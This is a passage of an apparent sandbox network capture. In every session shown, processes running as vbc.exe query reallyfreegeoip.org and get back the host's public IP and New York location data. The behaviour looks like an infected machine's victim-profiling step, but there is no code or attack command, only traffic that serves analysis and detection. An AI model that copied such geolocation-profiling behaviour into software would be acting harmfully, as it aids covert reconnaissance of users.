York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:42 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832611 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SdNtMliOeC2Qu%2BeI%2BPvlRi5%2B%2FjGz4K9zQOboGQa4BOlZr57Aj0MlKXCxHCw6xHdr9M8exMyfERhmISaRBzdw8phn39DMA1LvYBG0Zml3y5bM%2B9xDS6akx08MpHe2P3YllKd8ZSrJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd3645ebd172a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1940&rtt_var=774&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1372180&cwnd=212&unsent_bytes=0&cid=d76b394ad4590f55&ts=143&x=0"
2025-01-10 14:03:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:43 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:43 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832612 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KSieMnOs8kfsavfnM7DFB3GRJiReZfS29j964kPVN8C6OH5ywWczrkl6y2FWLlKm84c%2BK8UuGs5tbRm7ETBh%2BudChcJD6ME965%2FA7Fgbri1jrbtF5ZQYwGIlDt%2FWSKWKql2pSwEb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd364d8d0cc32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1528&rtt_var=583&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1858688&cwnd=178&unsent_bytes=0&cid=76e626cc7dd2ad6c&ts=162&x=0"
2025-01-10 14:03:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:44 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:44 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832613 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WAx%2FlDLOtzoD0vQTrRMQVgHClnLuIMSrq5vzxkKAq4lLLOUUYzVMGqkMAzah9D6HKGHoGe%2FcwBoYxFLvPHR29ApRRKvjqQRmLm8hyeN%2FYQ%2F410CqlfRelJoK3wq0YOTyBuyCr%2BYa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd3654e96142c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1705&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1669525&cwnd=212&unsent_bytes=0&cid=8c4f77c4af8dbbfb&ts=155&x=0"
2025-01-10 14:03:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:45 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:45 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832614 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R5m9Vf%2Fgbf6No%2BvKEeoLR1REBQJu6iev8iWPHGhBnhxAtmg6F4V37mM4putr%2FhjyM80Ej7MX%2FV8alaTOSPO0ysy4IrqD9h7Kk9vZMGsy4cuLbk78%2FVV328bfPQ8JkcICKEl0JMqa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd365adf531a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18626&min_rtt=17870&rtt_var=7242&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=163402&cwnd=157&unsent_bytes=0&cid=d1a1fbc124aa9dfb&ts=235&x=0"
2025-01-10 14:03:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49719	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:46 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:46 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832615 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NrOd%2BLCTxKwmr52ERzqaTnoF0YGcm8PaxwyHFsm8Q3Ah9zI0myoxp8Iwrju3ScjEqkELWPn78wYqJt1yBiPpe8ZZej8mtlyJB8gXN871nTvZwx0%2Byj5KtOAHZlhkjihnvbV4xbXr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd365e0f354363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1568&rtt_var=701&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1862244&cwnd=240&unsent_bytes=0&cid=94ced1119fae2273&ts=161&x=0"
2025-01-10 14:03:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49720	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:46 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:46 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832615 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTNMZ%2FE9TRRsAUAHm4gkaSuv0toctdIrRoXY9LZz6%2FyW2uZMubPapbMPqoU4b3jfoNLTNv%2FPfKZQEs%2Fa2VbNeuqN2C7H8YnGBaDFgYr4mdJN7XTjJiPmu38bH78Xl8n1zKMshf%2Fw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd3660ad6372a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=1940&rtt_var=915&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1084695&cwnd=212&unsent_bytes=0&cid=bd2edc9c5c446a38&ts=154&x=0"
2025-01-10 14:03:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:47 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:47 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832616 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NumjgYEFkTJlln8fkj6ACO7NrQKtmR7RMpIiHwoU0bW7%2BGL4H8Cdbn9A7xYkL1A2k%2FvhKbH5ejhmGZ0Vx1pX%2FExzk4HMtWcXyr1sXYIM9QdUYBrokB0P%2BZtkkc%2BsQ%2FOFjw9QhcWX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd36676ebb42c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1719&rtt_var=650&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1676234&cwnd=212&unsent_bytes=0&cid=11426759c689f6c9&ts=145&x=0"
2025-01-10 14:03:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49724	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:47 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:47 UTC	854	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832617 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MRbPor1cDbgfxJ8hlQh6DIYsChVPZPa4NGYQ29TgcJl3DqdYxModuk1LhLvSfmxV%2FiGu4QDdYnqRNH4t1LnUYCn6nA581VTDaLLm%2BclduK4cwFGDmyRm88u4nlmPrrnVb3jzUnNX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd36682e8a72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4266&min_rtt=1955&rtt_var=2309&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1493606&cwnd=212&unsent_bytes=0&cid=b0962493e2870cdc&ts=156&x=0"
2025-01-10 14:03:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49727	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:49 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:49 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832618 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W13iLXg%2BZJx6RFQZ4sN%2Fr1d4LojtRPkb2W0xba0q%2FQ7tyD4GlCYY11FggfH39dg0Q7bWDwfg6Yj%2FmOyEEmnj%2F3GlaXIRRPfj7O1hD8bgR6UgfJEE7SZTEE54J1%2BhByzdqmLTld67"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd366fd81d72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1966&rtt_var=747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1454183&cwnd=212&unsent_bytes=0&cid=82a1b3662a958a7e&ts=159&x=0"
2025-01-10 14:03:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49728	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:49 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:49 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832618 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3aUIX2Tvn5RO4k0zNbiJXgfnZ2jdSCLjzmJYAFZfVtUVEijvmP%2BCle8QBVIWgvosN6S%2FzTAXKci68NdxUnDG0bmIvcD04ZJCza3Mp78r%2FkK3LFQI%2BdWTEaD%2BuP6D2gxs2J9nQnB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd367238a34363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2484&min_rtt=1645&rtt_var=1216&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1775075&cwnd=240&unsent_bytes=0&cid=f56536038e3ac55a&ts=264&x=0"
